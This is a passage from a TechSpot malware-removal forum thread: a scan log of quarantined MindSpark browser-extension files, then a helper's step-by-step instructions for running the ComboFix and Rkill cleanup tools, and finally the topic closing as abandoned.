    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobalNotes.txt, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\rsvp-latest.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\searchSuggestLocale.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\testHttpTransport.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\unifiedLogger.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\unifiedLogging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\universalConsole.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\utils.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\_metadata\verified_contents.json, Quarantined, [cdde81063366e5512c3bbb8311f4d729],

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
  13. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Please download ComboFix from Here, Here or Here to your Desktop.

    **Note: In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**
    • Never rename Combofix unless instructed.
    • Close any open browsers.
    • Very Important! Temporarily disable your anti-virus and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
    • Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
    • Close any open browsers.
    • WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
    • Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
    • If there is no internet connection after running Combofix, then restart your computer to restore back your connection.
      If the connection is not there use restore point you created prior to running Combofix.
    • Double click on combofix.exe & follow the prompts.

    • NOTE1. If Combofix asks you to install Recovery Console, please allow it.
      NOTE 2. If Combofix asks you to update the program, always do so.
    • When finished, it will produce a report for you.
    • Please post the "C:\ComboFix.txt"
    **Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall
    **Note 2 for AVG and CA Internet Security (Total Defense Internet Security) users: ComboFix will not run until AVG/CA Internet Security is uninstalled as a protective measure against the anti-virus. This is because AVG/CA Internet Security "falsely" detects ComboFix (or its embedded files) as a threat and may remove them resulting in the tool not working correctly which in turn can cause "unpredictable results". Since AVG/CA Internet Security cannot be effectively disabled before running ComboFix, the author recommends you to uninstall AVG/CA Internet Security first.
    Use AppRemover to uninstall it: http://www.appremover.com/
    We can reinstall it when we're done with CF.
    **Note 3: If you receive an error Illegal operation attempted on a registery key that has been marked for deletion, restart computer to fix the issue.
    **Note 4: Some infections may take some significant time to be cured. As long as your computer clock is running Combofix is still working. Be patient.


    Make sure, you re-enable your security programs, when you're done with Combofix.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    NOTE.
    If, for some reason, Combofix refuses to run, try the following...

    Delete Combofix file, download fresh one, but rename combofix.exe to your_name.exe BEFORE saving it to your desktop.
    Do NOT run it yet.
    Download Rkill (courtesy of BleepingComputer.com) to your desktop.
    There are 2 different versions. If one of them won't run then download and try to run the other one.
    You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool, ignore them or shutdown your antivirus.

    rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
    iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

    Restart computer in safe mode

    • Double-click on the Rkill desktop icon to run the tool.
    • If using Windows Vista, 7 or 8 right-click on it and choose Run As Administrator.
    • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
    • If not, delete the file, then download and use the one provided in Link 2.
    • Do not reboot until instructed.
    • If the tool does not run from any of the links provided, please let me know.

    When the scan is done Notepad will open with rKill.txt log.
    NOTE. rKill.txt log will also be present on your desktop.

    Once you've gotten one of them to run, immediately run your_name.exe by double clicking on it.

    IF you had to run rKill post BOTH logs, rKill.txt and Combofix.txt.
     
  14. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Still with me?
     
  15. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    This topic is marked as abandoned and closed due to inactivity.

    This member will NOT be eligible to receive any more help in malware removal forum.
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...